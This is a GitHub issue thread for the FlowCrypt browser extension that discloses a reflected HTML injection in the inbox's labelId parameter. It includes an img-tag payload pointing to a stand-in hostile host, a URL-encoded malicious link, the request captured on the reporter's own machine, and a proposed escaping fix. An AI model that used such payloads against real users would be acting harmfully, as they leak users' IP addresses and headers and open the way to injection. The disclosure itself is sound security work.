### ISSUE TITLE
HTTP leak & HTML injection via idLabel url parameter of encrypted inbox

### ISSUE THREAD

**Issue by seisvelas** [FlowCrypt/flowcrypt-browser#2882]
An HTTP leak occurs when an attacker coaxes a user into unwittingly making a request to a hostile server that surveilles the victim's IP address and the HTTP headers sent by their browser. For a more detailed overview of the topic, check out 
https://github.com/cure53/HTTPLeaks.

## How the attack works

First, we create a payload that will call the hostile server. In this example, I'll use `<img src="https://hostile-server.test/pwn.jpeg">` lure the victim into clicking a malicious link to their FlowCrypt encrypted inbox. The link, including the poisoned parameter containing our URL encoded payload, should look something like this:
moz-extension://8d255737-0d56-4496-816c-c11baaccec3d/chrome/settings/inbox/inbox.htm?acctEmail=alej.alvarado94%40gmail.com&labelId=%3Cimg%20src%3D%22https%3A%2F%2Fhostile-server.test%2Fpwn.jpeg%22%3E

An attack that reflects a parameter supplied by the user is called a 'reflected' injection.

## The payload

I added the fake domain `hostile-server.test` to my /etc/hosts and ran the attack on myself. I received the following request:

```HTTP
GET /pwn.jpeg HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
```

And of course, I could also see the IP address of the incoming connection via tcpdump.

## How to fix this

The root problem is that the sanitization we're doing against this output is too permissive. We disallow hooks (good) but really should not be rendering this parameter as HTML at all. Here is the code that renders this:

https://github.com/FlowCrypt/flowcrypt-browser/blob/ae45bd3684cb0a75fcf3d8f447c1400e454aaec5/extension/chrome/settings/inbox/inbox-modules/inbox-list-threads-module.ts#L18

If we look into `displayBlock`, we see that it's sanitized for XSS but nothing else. Changing this should be easy and straightforward.

**Comment by seisvelas** [comment]
This is a pretty small issue. I was *so* close to having something much cooler, but settled for this when I realized what I wanted to do wouldn't be possible (like most leads, it goes nowhere and I have to keep looking elsewhere). 

I think there are quite a few more HTML injection that similarly leak HTTP headers and IP. I will try to hunt them down. I'll let you know here what I find.

**Comment by tomholub** [comment]
Very nice. To fix this, you can do Xss.htmlEscape (or is it Str.htmlEscape?) on the label id in here: `Messages in ${this.view.inboxMenuModule.getLabelName(labelId)}`. Thanks!
